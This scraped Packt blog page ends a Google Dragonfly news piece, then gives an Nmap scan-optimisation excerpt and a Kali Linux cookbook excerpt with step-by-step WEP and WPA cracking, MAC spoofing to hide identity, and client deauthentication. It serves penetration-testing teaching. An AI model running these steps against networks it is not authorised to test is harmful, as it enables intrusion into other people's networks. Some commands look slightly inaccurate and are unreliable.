the search engine for launch between January and April 2019, or sooner. “What Pichai said [about Dragonfly being an experiment] was ultimately horse shit,” said one Google source with knowledge of the project. “This was run with 100 percent intention of launch from day one. He was just trying to walk back a delicate political situation.” It is also alleged that Beaumont had intended from day one that the project should only be known about once it had been launched. “He wanted to make sure there would be no opportunity for any internal or external resistance to Dragonfly.” said one Google source to Intercept. This makes us wonder the extent to which Google really is concerned about upholding its founding values, and how far it will go in advocating internet freedom, openness, and democracy. It now looks a lot like a company who simply prioritizes growth and expansion into new markets, even if it means compromising on issues like internet censorship and surveillance. Perhaps we shouldn’t be surprised. Google CEO Sundar Pichai is expected to testify in Congress on Dec. 5 to discuss transparency and bias. Members of Congress will likely also ask about Google's plans in China. Public opinion on Intercept’s report is largely supportive. https://twitter.com/DennGordon/status/1068228199149125634 https://twitter.com/mpjme/status/1068268991238541312 https://twitter.com/cynthiamw/status/1068240969990983680 Google employee and inclusion activist Liz Fong Jones tweeted that she would match $100,000 in pledged donations to a fund to support employees who refuse to work in protest. https://twitter.com/lizthegrey/status/1068212346236096513 She has also shown full support for Zunger https://twitter.com/lizthegrey/status/1068209548320747521 Google employees join hands with Amnesty International urging Google to drop Project Dragonfly OK Google, why are you ok with mut(at)ing your ethos for Project DragonFly? Amnesty International takes on Google over Chinese censored search engine, Project Dragonfly.
Read more
  • 0
  • 0
  • 38721
article-image-optimize-scans
Packt
23 Jun 2017
20 min read
Save for later

To Optimize Scans

Packt
23 Jun 2017
20 min read
In this article by Paulino Calderon Pale author of the book Nmap Network Exploration and Security Auditing Cookbook, Second Edition, we will explore the following topics: Skipping phases to speed up scans Selecting the correct timing template Adjusting timing parameters Adjusting performance parameters (For more resources related to this topic, see here.) One of my favorite things about Nmap is how customizable it is. If configured properly, Nmap can be used to scan from single targets to millions of IP addresses in a single run. However, we need to be careful and need to understand the configuration options and scanning phases that can affect performance, but most importantly, really think about our scan objective beforehand. Do we need the information from the reverse DNS lookup? Do we know all targets are online? Is the network congested? Do targets respond fast enough? These and many more aspects can really add up to your scanning time. Therefore, optimizing scans is important and can save us hours if we are working with many targets. This article starts by introducing the different scanning phases, timing, and performance options. Unless we have a solid understanding of what goes on behind the curtains during a scan, we won't be able to completely optimize our scans. Timing templates are designed to work in common scenarios, but we want to go further and shave off those extra seconds per host during our scans. Remember that this can also not only improve performance but accuracy as well. Maybe those targets marked as offline were only too slow to respond to the probes sent after all. Skipping phases to speed up scans Nmap scans can be broken in phases. When we are working with many hosts, we can save up time by skipping tests or phases that return information we don't need or that we already have. By carefully selecting our scan flags, we can significantly improve the performance of our scans. This explains the process that takes place behind the curtains when scanning, and how to skip certain phases to speed up scans. How to do it... To perform a full port scan with the timing template set to aggressive, and without the reverse DNS resolution (-n) or ping (-Pn), use the following command: # nmap -T4 -n -Pn -p- 74.207.244.221 Note the scanning time at the end of the report: Nmap scan report for 74.207.244.221 Host is up (0.11s latency). Not shown: 65532 closed ports PORT     STATE SERVICE 22/tcp   open ssh 80/tcp   open http 9929/tcp open nping-echo Nmap done: 1 IP address (1 host up) scanned in 60.84 seconds Now, compare the running time that we get if we don't skip any tests: # nmap -p- scanme.nmap.org Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.11s latency). Not shown: 65532 closed ports PORT     STATE SERVICE 22/tcp   open ssh 80/tcp   open http 9929/tcp open nping-echo Nmap done: 1 IP address (1 host up) scanned in 77.45 seconds Although the time difference isn't very drastic, it really adds up when you work with many hosts. I recommend that you think about your objectives and the information you need, to consider the possibility of skipping some of the scanning phases that we will describe next. How it works... Nmap scans are divided in several phases. Some of them require some arguments to be set to run, but others, such as the reverse DNS resolution, are executed by default. Let's review the phases that can be skipped and their corresponding Nmap flag: Target enumeration: In this phase, Nmap parses the target list. This phase can't exactly be skipped, but you can save DNS forward lookups using only the IP addresses as targets. Host discovery: This is the phase where Nmap establishes if the targets are online and in the network. By default, Nmap sends an ICMP echo request and some additional probes, but it supports several host discovery techniques that can even be combined. To skip the host discovery phase (no ping), use the flag -Pn. And we can easily see what probes we skipped by comparing the packet trace of the two scans: $ nmap -Pn -p80 -n --packet-trace scanme.nmap.org SENT (0.0864s) TCP 106.187.53.215:62670 > 74.207.244.221:80 S ttl=46 id=4184 iplen=44 seq=3846739633 win=1024 <mss 1460> RCVD (0.1957s) TCP 74.207.244.221:80 > 106.187.53.215:62670 SA ttl=56 id=0 iplen=44 seq=2588014713 win=14600 <mss 1460> Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.11s latency). PORT   STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds For scanning without skipping host discovery, we use the command: $ nmap -p80 -n --packet-trace scanme.nmap.orgSENT (0.1099s) ICMP 106.187.53.215 > 74.207.244.221 Echo request (type=8/code=0) ttl=59 id=12270 iplen=28 SENT (0.1101s) TCP 106.187.53.215:43199 > 74.207.244.221:443 S ttl=59 id=38710 iplen=44 seq=1913383349 win=1024 <mss 1460> SENT (0.1101s) TCP 106.187.53.215:43199 > 74.207.244.221:80 A ttl=44 id=10665 iplen=40 seq=0 win=1024 SENT (0.1102s) ICMP 106.187.53.215 > 74.207.244.221 Timestamp request (type=13/code=0) ttl=51 id=42939 iplen=40 RCVD (0.2120s) ICMP 74.207.244.221 > 106.187.53.215 Echo reply (type=0/code=0) ttl=56 id=2147 iplen=28 SENT (0.2731s) TCP 106.187.53.215:43199 > 74.207.244.221:80 S ttl=51 id=34952 iplen=44 seq=2609466214 win=1024 <mss 1460> RCVD (0.3822s) TCP 74.207.244.221:80 > 106.187.53.215:43199 SA ttl=56 id=0 iplen=44 seq=4191686720 win=14600 <mss 1460> Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.10s latency). PORT   STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds Reverse DNS resolution: Host names often reveal by themselves additional information and Nmap uses reverse DNS lookups to obtain them. This step can be skipped by adding the argument -n to your scan arguments. Let's see the traffic generated by the two scans with and without reverse DNS resolution. First, let's skip reverse DNS resolution by adding -n to your command: $ nmap -n -Pn -p80 --packet-trace scanme.nmap.orgSENT (0.1832s) TCP 106.187.53.215:45748 > 74.207.244.221:80 S ttl=37 id=33309 iplen=44 seq=2623325197 win=1024 <mss 1460> RCVD (0.2877s) TCP 74.207.244.221:80 > 106.187.53.215:45748 SA ttl=56 id=0 iplen=44 seq=3220507551 win=14600 <mss 1460> Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.10s latency). PORT   STATE SERVICE 80/tcp open http   Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds And if we try the same command but not' skipping reverse DNS resolution, as follows: $ nmap -Pn -p80 --packet-trace scanme.nmap.org NSOCK (0.0600s) UDP connection requested to 106.187.36.20:53 (IOD #1) EID 8 NSOCK (0.0600s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID                                                 18 NSOCK (0.0600s) UDP connection requested to 106.187.35.20:53 (IOD #2) EID 24 NSOCK (0.0600s) Read request from IOD #2 [106.187.35.20:53] (timeout: -1ms) EID                                                 34 NSOCK (0.0600s) UDP connection requested to 106.187.34.20:53 (IOD #3) EID 40 NSOCK (0.0600s) Read request from IOD #3 [106.187.34.20:53] (timeout: -1ms) EID                                                 50 NSOCK (0.0600s) Write request for 45 bytes to IOD #1 EID 59 [106.187.36.20:53]:                                                 =............221.244.207.74.in-addr.arpa..... NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 8 [106.187.36.20:53] NSOCK (0.0600s) Callback: WRITE SUCCESS for EID 59 [106.187.36.20:53] NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 24 [106.187.35.20:53] NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 40 [106.187.34.20:53] NSOCK (0.0620s) Callback: READ SUCCESS for EID 18 [106.187.36.20:53] (174 bytes) NSOCK (0.0620s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID                                                 66 NSOCK (0.0620s) nsi_delete() (IOD #1) NSOCK (0.0620s) msevent_cancel() on event #66 (type READ) NSOCK (0.0620s) nsi_delete() (IOD #2) NSOCK (0.0620s) msevent_cancel() on event #34 (type READ) NSOCK (0.0620s) nsi_delete() (IOD #3) NSOCK (0.0620s) msevent_cancel() on event #50 (type READ) SENT (0.0910s) TCP 106.187.53.215:46089 > 74.207.244.221:80 S ttl=42 id=23960 ip                                                 len=44 seq=1992555555 win=1024 <mss 1460> RCVD (0.1932s) TCP 74.207.244.221:80 > 106.187.53.215:46089 SA ttl=56 id=0 iplen                                                =44 seq=4229796359 win=14600 <mss 1460> Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.10s latency). PORT   STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds Port scanning: In this phase, Nmap determines the state of the ports. By default, it uses SYN/TCP Connect scanning depending on the user privileges, but several other port scanning techniques are supported. Although this may not be so obvious, Nmap can do a few different things with targets without port scanning them like resolving their DNS names or checking whether they are online. For this reason, this phase can be skipped with the argument -sn: $ nmap -sn -R --packet-trace 74.207.244.221 SENT (0.0363s) ICMP 106.187.53.215 > 74.207.244.221 Echo request (type=8/code=0) ttl=56 id=36390 iplen=28 SENT (0.0364s) TCP 106.187.53.215:53376 > 74.207.244.221:443 S ttl=39 id=22228 iplen=44 seq=155734416 win=1024 <mss 1460> SENT (0.0365s) TCP 106.187.53.215:53376 > 74.207.244.221:80 A ttl=46 id=36835 iplen=40 seq=0 win=1024 SENT (0.0366s) ICMP 106.187.53.215 > 74.207.244.221 Timestamp request (type=13/code=0) ttl=50 id=2630 iplen=40 RCVD (0.1377s) TCP 74.207.244.221:443 > 106.187.53.215:53376 RA ttl=56 id=0 iplen=40 seq=0 win=0 NSOCK (0.1660s) UDP connection requested to 106.187.36.20:53 (IOD #1) EID 8 NSOCK (0.1660s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID 18 NSOCK (0.1660s) UDP connection requested to 106.187.35.20:53 (IOD #2) EID 24 NSOCK (0.1660s) Read request from IOD #2 [106.187.35.20:53] (timeout: -1ms) EID 34 NSOCK (0.1660s) UDP connection requested to 106.187.34.20:53 (IOD #3) EID 40 NSOCK (0.1660s) Read request from IOD #3 [106.187.34.20:53] (timeout: -1ms) EID 50 NSOCK (0.1660s) Write request for 45 bytes to IOD #1 EID 59 [106.187.36.20:53]: [............221.244.207.74.in-addr.arpa..... NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 8 [106.187.36.20:53] NSOCK (0.1660s) Callback: WRITE SUCCESS for EID 59 [106.187.36.20:53] NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 24 [106.187.35.20:53] NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 40 [106.187.34.20:53] NSOCK (0.1660s) Callback: READ SUCCESS for EID 18 [106.187.36.20:53] (174 bytes) NSOCK (0.1660s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID 66 NSOCK (0.1660s) nsi_delete() (IOD #1) NSOCK (0.1660s) msevent_cancel() on event #66 (type READ) NSOCK (0.1660s) nsi_delete() (IOD #2) NSOCK (0.1660s) msevent_cancel() on event #34 (type READ) NSOCK (0.1660s) nsi_delete() (IOD #3) NSOCK (0.1660s) msevent_cancel() on event #50 (type READ) Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.10s latency). Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds In the previous example, we can see that an ICMP echo request and a reverse DNS lookup were performed (We forced DNS lookups with the option -R), but no port scanning was done. There's more... I recommend that you also run a couple of test scans to measure the speeds of the different DNS servers. I've found that ISPs tend to have the slowest DNS servers, but you can make Nmap use different DNS servers by specifying the argument --dns-servers. For example, to use Google's DNS servers, use the following command: # nmap -R --dns-servers 8.8.8.8,8.8.4.4 -O scanme.nmap.org You can test your DNS server speed by comparing the scan times. The following command tells Nmap not to ping or scan the port and only perform a reverse DNS lookup: $ nmap -R -Pn -sn 74.207.244.221 Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up. Nmap done: 1 IP address (1 host up) scanned in 1.01 seconds To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix-Scanning Phases for more information. Selecting the correct timing template Nmap includes six templates that set different timing and performance arguments to optimize your scans based on network condition. Even though Nmap automatically adjusts some of these values, it is recommended that you set the correct timing template to hint Nmap about the speed of your network connection and the target's response time. The following will teach you about Nmap's timing templates and how to choose the more appropriate one. How to do it... Open your terminal and type the following command to use the aggressive timing template (-T4). Let's also use debugging (-d) to see what Nmap option -T4 sets: # nmap -T4 -d 192.168.4.20 --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 500, min 100, max 1250 max-scan-delay: TCP 10, UDP 1000, SCTP 10 parallelism: min 0, max 0 max-retries: 6, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- <Scan output removed for clarity> You may use the integers between 0 and 5, for example,-T[0-5]. How it works... The option -T is used to set the timing template in Nmap. Nmap provides six timing templates to help users tune the timing and performance arguments. The available timing templates and their initial configuration values are as follows: Paranoid(-0)—This template is useful to avoid detection systems, but it is painfully slow because only one port is scanned at a time, and the timeout between probes is 5 minutes: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 300000, min 100, max 300000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 1 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Sneaky (-1)—This template is useful for avoiding detection systems but is still very slow: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 15000, min 100, max 15000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 1 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Polite (-2)—This template is used when scanning is not supposed to interfere with the target system, very conservative and safe setting: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 1000, min 100, max 10000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 1 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Normal (-3)—This is Nmap's default timing template, which is used when the argument -T is not set: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 1000, min 100, max 10000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 0 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Aggressive (-4)—This is the recommended timing template for broadband and Ethernet connections: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 500, min 100, max 1250 max-scan-delay: TCP 10, UDP 1000, SCTP 10 parallelism: min 0, max 0 max-retries: 6, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Insane (-5)—This timing template sacrifices accuracy for speed: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 250, min 50, max 300 max-scan-delay: TCP 5, UDP 1000, SCTP 5 parallelism: min 0, max 0 max-retries: 2, host-timeout: 900000 min-rate: 0, max-rate: 0 --------------------------------------------- There's more... An interactive mode in Nmap allows users to press keys to dynamically change the runtime variables, such as verbose, debugging, and packet tracing. Although the discussion of including timing and performance options in the interactive mode has come up a few times in the development mailing list; so far, this hasn't been implemented yet. However, there is an unofficial patch submitted in June 2012 that allows you to change the minimum and maximum packet rate values(--max-rateand --min-rate) dynamically. If you would like to try it out, it's located at http://seclists.org/nmap-dev/2012/q2/883. Adjusting timing parameters Nmap not only adjusts itself to different network and target conditions while scanning, but it can be fine-tuned using timing options to improve performance. Nmap automatically calculates packet round trip, timeout, and delay values, but these values can also be set manually through specific settings. The following describes the timing parameters supported by Nmap. How to do it... Enter the following command to adjust the initial round trip timeout, the delay between probes and a time out for each scanned host: # nmap -T4 --scan-delay 1s --initial-rtt-timeout 150ms --host-timeout 15m -d scanme.nmap.org --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 150, min 100, max 1250 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 0 max-retries: 6, host-timeout: 900000 min-rate: 0, max-rate: 0 --------------------------------------------- How it works... Nmap supports different timing arguments that can be customized. However, setting these values incorrectly will most likely hurt performance rather than improve it. Let's examine closer each timing parameter and learn its Nmap option parameter name. The Round Trip Time (RTT) value is used by Nmap to know when to give up or retransmit a probe response. Nmap estimates this value by analyzing previous responses, but you can set the initial RTT timeout with the argument --initial-rtt-timeout, as shown in the following command: # nmap -A -p- --initial-rtt-timeout 150ms <target> In addition, you can set the minimum and maximum RTT timeout values with--min-rtt-timeout and --max-rtt-timeout, respectively, as shown in the following command: # nmap -A -p- --min-rtt-timeout 200ms --max-rtt-timeout 600ms <target> Another very important setting we can control in Nmap is the waiting time between probes. Use the arguments --scan-delay and --max-scan-delay to set the waiting time and maximum amount of time allowed to wait between probes, respectively, as shown in the following commands: # nmap -A --max-scan-delay 10s scanme.nmap.org # nmap -A --scan-delay 1s scanme.nmap.org Note that the arguments previously shown are very useful when avoiding detection mechanisms. Be careful not to set --max-scan-delay too low because it will most likely miss the ports that are open. There's more... If you would like Nmap to give up on a host after a certain amount of time, you can set the argument --host-timeout: # nmap -sV -A -p- --host-timeout 5m <target> Estimating round trip times with Nping To use Nping to estimate the round trip time taken between the target and you, the following command can be used: # nping -c30 <target> This will make Nping send 30 ICMP echo request packets, and after it finishes, it will show the average, minimum, and maximum RTT values obtained: # nping -c30 scanme.nmap.org ... SENT (29.3569s) ICMP 50.116.1.121 > 74.207.244.221 Echo request (type=8/code=0) ttl=64 id=27550 iplen=28 RCVD (29.3576s) ICMP 74.207.244.221 > 50.116.1.121 Echo reply (type=0/code=0) ttl=63 id=7572 iplen=28 Max rtt: 10.170ms | Min rtt: 0.316ms | Avg rtt: 0.851ms Raw packets sent: 30 (840B) | Rcvd: 30 (840B) | Lost: 0 (0.00%) Tx time: 29.09096s | Tx bytes/s: 28.87 | Tx pkts/s: 1.03 Rx time: 30.09258s | Rx bytes/s: 27.91 | Rx pkts/s: 1.00 Nping done: 1 IP address pinged in 30.47 seconds Examine the round trip times and use the maximum to set the correct --initial-rtt-timeout and --max-rtt-timeout values. The official documentation recommends using double the maximum RTT value for the --initial-rtt-timeout, and as high as four times the maximum round time value for the –max-rtt-timeout. Displaying the timing settings Enable debugging to make Nmap inform you about the timing settings before scanning: $ nmap -d<target> --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 1000, min 100, max 10000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 0 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix-Scanning Phases for more information. Adjusting performance parameters Nmap not only adjusts itself to different network and target conditions while scanning, but it also supports several parameters that affect the behavior of Nmap, such as the number of hosts scanned concurrently, number of retries, and number of allowed probes. Learning how to adjust these parameters properly can reduce a lot of your scanning time. The following explains the Nmap parameters that can be adjusted to improve performance. How to do it... Enter the following command, adjusting the values for your target condition: $ nmap --min-hostgroup 100 --max-hostgroup 500 --max-retries 2 <target> How it works... The command shown previously tells Nmap to scan and report by grouping no less than 100 (--min-hostgroup 100) and no more than 500 hosts (--max-hostgroup 500). It also tells Nmap to retry only twice before giving up on any port (--max-retries 2): # nmap --min-hostgroup 100 --max-hostgroup 500 --max-retries 2 <target> It is important to note that setting these values incorrectly will most likely hurt the performance or accuracy rather than improve it. Nmap sends many probes during its port scanning phase due to the ambiguity of what a lack of responsemeans; either the packet got lost, the service is filtered, or the service is not open. By default, Nmap adjusts the number of retries based on the network conditions, but you can set this value with the argument --max-retries. By increasing the number of retries, we can improve Nmap's accuracy, but keep in mind this sacrifices speed: $ nmap --max-retries 10<target> The arguments --min-hostgroup and --max-hostgroup control the number of hosts that we probe concurrently. Keep in mind that reports are also generated based on this value, so adjust it depending on how often would you like to see the scan results. Larger groups are optimalto improve performance, but you may prefer smaller host groups on slow networks: # nmap -A -p- --min-hostgroup 100 --max-hostgroup 500 <target> There is also a very important argument that can be used to limit the number of packets sent per second by Nmap. The arguments --min-rate and --max-rate need to be used carefully to avoid undesirable effects. These rates are set automatically by Nmap if the arguments are not present: # nmap -A -p- --min-rate 50 --max-rate 100 <target> Finally, the arguments --min-parallelism and --max-parallelism can be used to control the number of probes for a host group. By setting these arguments, Nmap will no longer adjust the values dynamically: # nmap -A --max-parallelism 1 <target> # nmap -A --min-parallelism 10 --max-parallelism 250 <target> There's more... If you would like Nmap to give up on a host after a certain amount of time, you can set the argument --host-timeout, as shown in the following command: # nmap -sV -A -p- --host-timeout 5m <target> Interactive mode in Nmap allows users to press keys to dynamically change the runtime variables, such as verbose, debugging, and packet tracing. Although the discussion of including timing and performance options in the interactive mode has come up a few times in the development mailing list, so far this hasn't been implemented yet. However, there is an unofficial patch submitted in June 2012 that allows you to change the minimum and maximum packet rate values (--max-rate and --min-rate) dynamically. If you would like to try it out, it's located at http://seclists.org/nmap-dev/2012/q2/883. To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix-Scanning Phases for more information. Summary In this article, we are finally able to learn how to implement and optimize scans. Nmap scans among several clients, allowing us to save time and take advantage of extra bandwidth and CPU resources. This article is short but full of tips for optimizing your scans. Prepare to dig deep into Nmap's internals and the timing and performance parameters! Resources for Article: Further resources on this subject: Introduction to Network Security Implementing OpenStack Networking and Security Communication and Network Security
Read more
  • 0
  • 0
  • 37401

article-image-wireless-attacks-kali-linux
Packt
11 Oct 2013
13 min read
Save for later

Wireless Attacks in Kali Linux

Packt
11 Oct 2013
13 min read
In this article, by Willie L. Pritchett, author of the Kali Linux Cookbook, we will learn about the various wireless attacks. These days, wireless networks are everywhere. With users being on the go like never before, having to remain stationary because of having to plug into an Ethernet cable to gain Internet access is not feasible. For this convenience, there is a price to be paid; wireless connections are not as secure as Ethernet connections. In this article, we will explore various methods for manipulating radio network traffic including mobile phones and wireless networks. We will cover the following topics in this article: Wireless network WEP cracking Wireless network WPA/WPA2 cracking Automating wireless network cracking Accessing clients using a fake AP URL traffic manipulation Port redirection Sniffing network traffic (For more resources related to this topic, see here.) Wireless network WEP cracking Wireless Equivalent Privacy, or WEP as it's commonly referred to, has been around since 1999 and is an older security standard that was used to secure wireless networks. In 2003, WEP was replaced by WPA and later by WPA2. Due to having more secure protocols available, WEP encryption is rarely used. As a matter of fact, it is highly recommended that you never use WEP encryption to secure your network! There are many known ways to exploit WEP encryption and we will explore one of those ways in this recipe. In this recipe, we will use the AirCrack suite to crack a WEP key. The AirCrack suite (or AirCrack NG as it's commonly referred to) is a WEP and WPA key cracking program that captures network packets, analyzes them, and uses this data to crack the WEP key. Getting ready In order to perform the tasks of this recipe, experience with the Kali terminal window is required. A supported wireless card configured for packet injection will also be required. In case of a wireless card, packet injection involves sending a packet, or injecting it onto an already established connection between two parties. Please ensure your wireless card allows for packet injection as this is not something that all wireless cards support. How to do it... Let's begin the process of using AirCrack to crack a network session secured by WEP. Open a terminal window and bring up a list of wireless network interfaces: airmon-ng Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned. Next, we need to stop the wlan0 interface and take it down so that we can change our MAC address in the next step. airmon-ng stop ifconfig wlan0 down Next, we need to change the MAC address of our interface. Since the MAC address of your machine identifies you on any network, changing the identity of our machine allows us to keep our true MAC address hidden. In this case, we will use 00:11:22:33:44:55. macchanger --mac 00:11:22:33:44:55 wlan0 Now we need to restart airmon-ng. airmon-ng start wlan0 Next, we will use airodump to locate the available wireless networks nearby. airodump-ng wlan0 A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right click your mouse, and select copy. Also, make note of the channel that the network is transmitting its signal upon. You will find this information in the Channel column. In this case, the channel is 10. Now we run airodump and copy the information for the selected BSSID to a file. We will utilize the following options: –c allows us to select our channel. In this case, we use 10. –w allows us to select the name of our file. In this case, we have chosen wirelessattack. –bssid allows us to select our BSSID. In this case, we will paste 09:AC:90:AB:78 from the clipboard. airodump-ng –c 10 –w wirelessattack --bssid 09:AC:90:AB:78 wlan0 A new terminal window will open displaying the output from the previous command.Leave this window open. Open another terminal window; to attempt to make an association, we will run aireplay, which has the following syntax: aireplay-ng -1 0 –a [BSSID] –h [our chosen MAC address] –e [ESSID] [Interface] aireplay-ng -1 0 -a 09:AC:90:AB:78 –h 00:11:22:33:44:55 –e backtrack wlan0 Next, we send some traffic to the router so that we have some data to capture. We use aireplay again in the following format: aireplay-ng -3 –b [BSSID] – h [Our chosen MAC address] [Interface] aireplay-ng -3 –b 09:AC:90:AB:78 –h 00:11:22:33:44:55 wlan0 Your screen will begin to fill with traffic. Let this process run for a minute or two until we have information to run the crack. Finally, we run AirCrack to crack the WEP key. aircrack-ng –b 09:AC:90:AB:78 wirelessattack.cap That's it! How it works... In this recipe, we used the AirCrack suite to crack the WEP key of a wireless network. AirCrack is one of the most popular programs for cracking WEP. AirCrack works by gathering packets from a wireless connection over WEP and then mathematically analyzing the data to crack the WEP encrypted key. We began the recipe by starting AirCrack and selecting our desired interface. Next, we changed our MAC address which allowed us to change our identity on the network and then searched for available wireless networks to attack using airodump. Once we found the network we wanted to attack, we used aireplay to associate our machine with the MAC address of the wireless device we were attacking. We concluded by gathering some traffic and then brute-forced the generated CAP file in order to get the wireless password. Wireless network WPA/WPA2 cracking WiFi Protected Access, or WPA as it's commonly referred to, has been around since 2003 and was created to secure wireless networks and replace the outdated previous standard, WEP encryption. In 2003, WEP was replaced by WPA and later by WPA2. Due to having more secure protocols available, WEP encryption is rarely used. In this recipe, we will use the AirCrack suite to crack a WPA key. The AirCrack suite (or AirCrack NG as it's commonly referred) is a WEP and WPA key cracking program that captures network packets, analyzes them, and uses this data to crack the WPA key. Getting ready In order to perform the tasks of this recipe, experience with the Kali Linux terminal windows is required. A supported wireless card configured for packet injection will also be required. In the case of a wireless card, packet injection involves sending a packet, or injecting it onto an already established connection between two parties. How to do it... Let's begin the process of using AirCrack to crack a network session secured by WPA. Open a terminal window and bring up a list of wireless network interfaces. airmon-ng Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned. Next, we need to stop the wlan0 interface and take it down. airmon-ng stop wlan0 ifconfig wlan0 down Next, we need to change the MAC address of our interface. In this case, we will use 00:11:22:33:44:55. macchanger -–mac 00:11:22:33:44:55 wlan0 Now we need to restart airmon-ng. airmon-ng start wlan0 Next, we will use airodump to locate the available wireless networks nearby. airodump-ng wlan0 A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right-click, and select copy. Also, make note of the channel that the network is transmitting its signal upon. You will find this information in the Channel column. In this case, the channel is 10. Now we run airodump and copy the information for the selected BSSID to a file. We will utilize the following options: –c allows us to select our channel. In this case, we use 10. –w allows us to select the name of our file. In this case, we have chosen wirelessattack. –bssid allows us to select our BSSID. In this case, we will paste 09:AC:90:AB:78 from the clipboard. airodump-ng –c 10 –w wirelessattack --bssid 09:AC:90:AB:78 wlan0 A new terminal window will open displaying the output from the previous command.Leave this window open. Open another terminal window; to attempt to make an association, we will run aireplay, which has the following syntax: aireplay-ng –dauth 1 –a [BSSID] –c [our chosen MAC address] [Interface]. This process may take a few moments. Aireplay-ng --deauth 1 –a 09:AC:90:AB:78 –c 00:11:22:33:44:55 wlan0 Finally, we run AirCrack to crack the WPA key. The –w option allows us to specify the location of our wordlist. We will use the .cap file that we named earlier. In this case,the file's name is wirelessattack.cap. Aircrack-ng –w ./wordlist.lst wirelessattack.cap That's it! How it works... In this recipe, we used the AirCrack suite to crack the WPA key of a wireless network. AirCrack is one of the most popular programs for cracking WPA. AirCrack works by gathering packets from a wireless connection over WPA and then brute-forcing passwords against the gathered data until a successful handshake is established. We began the recipe by starting AirCrack and selecting our desired interface. Next, we changed our MAC address which allowed us to change our identity on the network and then searched for available wireless networks to attack using airodump . Once we found the network we wanted to attack, we used aireplay to associate our machine with the MAC address of the wireless device we were attacking. We concluded by gathering some traffic and then brute forced the generated CAP file in order to get the wireless password. Automating wireless network cracking In this recipe we will use Gerix to automate a wireless network attack. Gerix is an automated GUI for AirCrack. Gerix comes installed by default on Kali Linux and will speed up your wireless network cracking efforts. Getting ready A supported wireless card configured for packet injection will be required to complete this recipe. In the case of a wireless card, packet injection involves sending a packet, or injecting it, onto an already established connection between two parties. How to do it... Let's begin the process of performing an automated wireless network crack with Gerix by downloading it. Using wget, navigate to the following website to download Gerix. wget https://bitbucket.org/Skin36/gerix-wifi-cracker-pyqt4/downloads/gerix-wifi-cracker-master.rar Once the file has been downloaded, we now need to extract the data from the RAR file. unrar x gerix-wifi-cracker-master.rar Now, to keep things consistent, let's move the Gerix folder to the /usr/share directory with the other penetration testing tools. mv gerix-wifi-cracker-master /usr/share/gerix-wifi-cracker Let's navigate to the directory where Gerix is located. cd /usr/share/gerix-wifi-cracker To begin using Gerix, we issue the following command: python gerix.py Click on the Configuration tab. On the Configuration tab, select your wireless interface. Click on the Enable/Disable Monitor Mode button. Once Monitor mode has been enabled successfully, under Select Target Network, click on the Rescan Networks button. The list of targeted networks will begin to fill. Select a wireless network to target. In this case, we select a WEP encrypted network. Click on the WEP tab. Under Functionalities, click on the Start Sniffing and Logging button. Click on the subtab WEP Attacks (No Client). Click on the Start false access point authentication on victim button. Click on the Start the ChopChop attack button. In the terminal window that opens, answer Y to the Use this packet question. Once completed, copy the .cap file generated. Click on the Create the ARP packet to be injected on the victim access point button. Click on the Inject the created packet on victim access point button. In the terminal window that opens, answer Y to the Use this packet question. Once you have gathered approximately 20,000 packets, click on the Cracking tab. 